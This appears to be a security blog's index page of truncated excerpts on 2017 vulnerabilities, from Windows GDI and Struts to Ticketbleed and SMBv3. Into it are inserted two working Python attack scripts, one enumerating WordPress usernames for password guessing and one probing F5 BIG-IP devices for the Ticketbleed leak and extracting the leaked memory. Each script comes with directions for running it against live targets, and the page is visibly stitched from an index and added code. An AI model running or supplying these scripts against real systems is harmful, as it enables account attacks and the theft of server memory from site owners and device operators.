Windows GDI Elevation of Privilege Vulnerability: CVE-2017-0005

An Elevation of Privilege vulnerability in the Windows GDI component was reported to Microsoft by the Lockheed Martin Computer Incident Response Team. The vulnerability is assigned CVE-2017-0005, “Windows GDI Elevation of Privilege Vulnerability”. The bug was addressed in MS17-013 along with other GDI-targeted EoP vulnerabilities. According to Microsoft this exploit is used by the …

ACTi Cameras Multiple Security Vulnerabilities

The IP security camera industry has grown a lot over the past few years, from consumer-grade home models to professional-grade models. Internet-connected video cameras, or IP cameras, are widely used in security systems, offering the advantage that footage can be streamed remotely from anywhere. However, anything connected to the Internet poses risks if not …

WordPress REST API User Enumeration Abuse

WordPress is a popular, open-source blogging tool and content management system based on PHP and MySQL. According to the latest BuiltWith statistics, a total of 18,619,652 live websites use WordPress, about 5% of all websites on the Internet. About three months ago, with the advent of WordPress 4.7, support for REpresentational State Transfer …
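As an added example (not code from the original post), the script below walks the core REST API's `/wp-json/wp/v2/users` collection that WordPress 4.7 exposes without authentication and pulls out the fields that matter for an attacker. The base URL `blog.example` and the JSON bodies in `SAMPLE_PAGES` are constructed for illustration, and the `fetch` parameter is an assumption of this example so the walk can run offline.

```python
import json
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Optional

USERS_ROUTE = "/wp-json/wp/v2/users"   # core REST route shipped with WordPress 4.7


def extract_users(body: str) -> List[Dict[str, object]]:
    """Keep the fields an attacker cares about from one page of /users.
    'slug' is user_nicename, which WordPress derives from the login name unless
    the site owner changed it, so it is normally the username to feed into a
    password-guessing attack."""
    try:
        data = json.loads(body)
    except ValueError:
        return []
    if not isinstance(data, list):      # REST error objects ({"code": "rest_..."}) are dicts
        return []
    return [{"id": u.get("id"), "slug": u.get("slug"), "name": u.get("name")}
            for u in data if isinstance(u, dict) and "slug" in u]


def http_get(url: str) -> Optional[str]:
    """Live fetcher. Returns None on an HTTP error, which is what a blocked route
    (401/403) or a page past the end (400 rest_post_invalid_page_number) produces."""
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError:
        return None


def enumerate_users(base_url: str,
                    fetch: Callable[[str], Optional[str]] = http_get,
                    per_page: int = 100, max_pages: int = 20) -> List[Dict[str, object]]:
    """Walk the collection page by page until a short page or an error.
    Unauthenticated requests only list users who have published content, so an
    empty result does not prove the site has no other accounts."""
    found: List[Dict[str, object]] = []
    for page in range(1, max_pages + 1):
        url = f"{base_url.rstrip('/')}{USERS_ROUTE}?per_page={per_page}&page={page}"
        body = fetch(url)
        if body is None:
            break
        users = extract_users(body)
        found.extend(users)
        if len(users) < per_page:
            break
    return found


# Constructed responses (not taken from a real site) so the walk runs offline.
SAMPLE_PAGES = {
    "https://blog.example/wp-json/wp/v2/users?per_page=100&page=1": json.dumps([
        {"id": 1, "name": "Site Owner", "slug": "admin",
         "link": "https://blog.example/author/admin/"},
        {"id": 7, "name": "J. Doe", "slug": "jdoe",
         "link": "https://blog.example/author/jdoe/"},
    ]),
}


def sample_fetch(url: str) -> Optional[str]:
    """Offline stand-in for http_get backed by SAMPLE_PAGES."""
    return SAMPLE_PAGES.get(url)


if __name__ == "__main__":
    for u in enumerate_users("https://blog.example", fetch=sample_fetch):
        print(u["id"], u["slug"], u["name"])
```

Against a live site, call `enumerate_users("https://target")` with the default fetcher. On the defensive side, a common WordPress mitigation is to drop the `/wp/v2/users` routes for unauthenticated requests through the `rest_endpoints` filter; the walk above then gets an error on the first page and stops.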

Apache Struts Jakarta Multipart Parser Remote Code Execution Vulnerability

Introduction: On March 7, 2017, Apache issued an emergency security alert: Apache Struts was exposed to a high-risk remote command execution vulnerability, tracked as CVE-2017-5638. Struts is an open source project of the Apache Foundation's Jakarta project team that uses the MVC pattern to help Java developers build J2EE web applications. At present, …

Chakra: Type Confusion Vulnerability – CVE-2016-7201

Introduction: In September last year, Google's Project Zero team disclosed vulnerabilities in Chakra, the Microsoft JavaScript engine. CVE-2016-7200 and CVE-2016-7201 are two such bugs that caught the limelight. Even though they are old bugs, their specifics are worth discussing. Both of these vulnerabilities went from PoC of vulnerability to …

Microsoft Edge and Internet Explorer Type Confusion Zero Day Vulnerability

Introduction: Google Project Zero recently disclosed an unpatched vulnerability that affects Microsoft Edge and Internet Explorer, tracked as CVE-2017-0037. The disclosed PoC only demonstrates a DoS attack on the target, but arbitrary code execution could also be possible. A PoC for the same is also available here. Exploit: The CVE-2017-0037 vulnerability, so-called ‘type …

Trend Micro Interscan Web Security Virtual Appliance (IWSVA) 6.5.x Multiple Vulnerabilities

I recently came across one of Trend Micro's enterprise security products, ‘InterScan Web Security Virtual Appliance (IWSVA)’. It is a secure web gateway that combines application control with zero-day exploit detection, advanced anti-malware and ransomware scanning, real-time web reputation, and flexible URL filtering to provide Internet threat protection. I downloaded the latest version ‘IWSVA version …

Ticketbleed Vulnerability On F5 BIG-IP

A remote memory-leaking vulnerability called Ticketbleed (CVE-2016-9244) has been found in F5 BIG-IP devices. The vulnerability allows a remote attacker to extract up to 31 bytes of uninitialized memory at a time. The root cause of this Heartbleed-style vulnerability is that, during the TLS/SSL handshake, F5 BIG-IP servers echo back a fixed-size chunk of memory even when the client sends less …
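The handshake behaviour described above, as an added example that is not part of the original post: the client offers a session ticket for resumption together with a deliberately short session_id, and the checker compares what the ServerHello echoes against what was sent. A resuming server must echo the session_id exactly; a server that copies a fixed 32 bytes returns the sent byte(s) followed by memory the client never supplied. The function names, the 16-byte placeholder ticket and the `make_server_hello` reply are constructed for illustration; a real probe needs a ticket the target actually issued in an earlier handshake.

```python
import os
import struct

HANDSHAKE = 0x16                      # TLS record content type
CLIENT_HELLO, SERVER_HELLO = 0x01, 0x02
SESSION_TICKET_EXT = 0x0023           # RFC 5077 SessionTicket TLS extension


def build_client_hello(session_id: bytes, ticket: bytes) -> bytes:
    """TLS 1.2 ClientHello that offers `ticket` for resumption and carries a
    deliberately short session_id (the probe uses a single byte)."""
    if not 1 <= len(session_id) <= 32:
        raise ValueError("session_id must be 1..32 bytes")
    cipher_suites = struct.pack("!HH", 2, 0x002F)      # one suite: TLS_RSA_WITH_AES_128_CBC_SHA
    compression = b"\x01\x00"                           # one method: null
    ext = struct.pack("!HH", SESSION_TICKET_EXT, len(ticket)) + ticket
    body = (b"\x03\x03" + os.urandom(32)
            + bytes([len(session_id)]) + session_id
            + cipher_suites + compression
            + struct.pack("!H", len(ext)) + ext)
    hs = bytes([CLIENT_HELLO]) + len(body).to_bytes(3, "big") + body
    return bytes([HANDSHAKE, 0x03, 0x01]) + struct.pack("!H", len(hs)) + hs


def parse_hello_session_id(record: bytes, expected_type: int) -> bytes:
    """Return the session_id of a ClientHello or ServerHello record. Both start
    with version(2) random(32) session_id_len(1) session_id, so one parser serves both."""
    if len(record) < 5 or record[0] != HANDSHAKE:
        raise ValueError("not a TLS handshake record")
    rec_len = struct.unpack("!H", record[3:5])[0]
    hs = record[5:5 + rec_len]
    if len(hs) < 4 or hs[0] != expected_type:
        raise ValueError("unexpected handshake message type")
    body = hs[4:4 + int.from_bytes(hs[1:4], "big")]
    if len(body) < 35:
        raise ValueError("hello message truncated")
    sid_len = body[34]
    sid = body[35:35 + sid_len]
    if sid_len > 32 or len(sid) != sid_len:
        raise ValueError("bad session_id length")
    return sid


def ticketbleed_check(sent_session_id: bytes, server_hello: bytes):
    """Return (vulnerable, leaked_bytes). With a 1-byte probe a vulnerable server
    returns 32 bytes: our byte plus 31 bytes of its memory. Caveat: a server that
    rejects the ticket and mints a fresh 32-byte id matches the probe byte by chance
    1 time in 256, so repeat with different probe bytes before calling it a leak."""
    echoed = parse_hello_session_id(server_hello, SERVER_HELLO)
    if len(echoed) > len(sent_session_id) and echoed.startswith(sent_session_id):
        return True, echoed[len(sent_session_id):]
    return False, b""


def make_server_hello(session_id: bytes) -> bytes:
    """Constructed ServerHello (not captured traffic) so the check runs offline."""
    body = (b"\x03\x03" + b"\x11" * 32 + bytes([len(session_id)]) + session_id
            + b"\x00\x2f" + b"\x00")                    # chosen suite, null compression
    hs = bytes([SERVER_HELLO]) + len(body).to_bytes(3, "big") + body
    return bytes([HANDSHAKE, 0x03, 0x03]) + struct.pack("!H", len(hs)) + hs


if __name__ == "__main__":
    probe = b"\x41"
    print(ticketbleed_check(probe, make_server_hello(probe + bytes(range(31)))))
    print(ticketbleed_check(probe, make_server_hello(probe)))
```

To run this against a real device, send `build_client_hello(probe, ticket)` over a TCP connection to port 443 and hand the first record the server returns to `ticketbleed_check`; the 31-byte upper bound in the excerpt follows directly from the 32-byte copy minus the one byte the probe supplies.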

WordPress Vulnerabilities Are Being Actively Exploited

At the end of January 2017, WordPress released version 4.7.2 to fix multiple security vulnerabilities. Not long after that, active exploits against these vulnerabilities were detected. Attackers left messages like “by NG689Skw” or “by w4l3XzY3” on the victims' websites. Here's a screenshot: You can see that the attacker became “ADMIN” of the WordPress site, and that remote code …

Windows SMBv3 Zero Day Vulnerability

Introduction: A buffer overflow vulnerability in SMBv3 was made public on February 1, 2017, by Laurent Gaffie. The CVE-ID is CVE-2017-0016. A PoC for the same is also available here. The bug affects Windows Server 2012, Windows Server 2016 and Windows 10. At the moment the PoC only demonstrates a DoS attack on the target; we are not sure …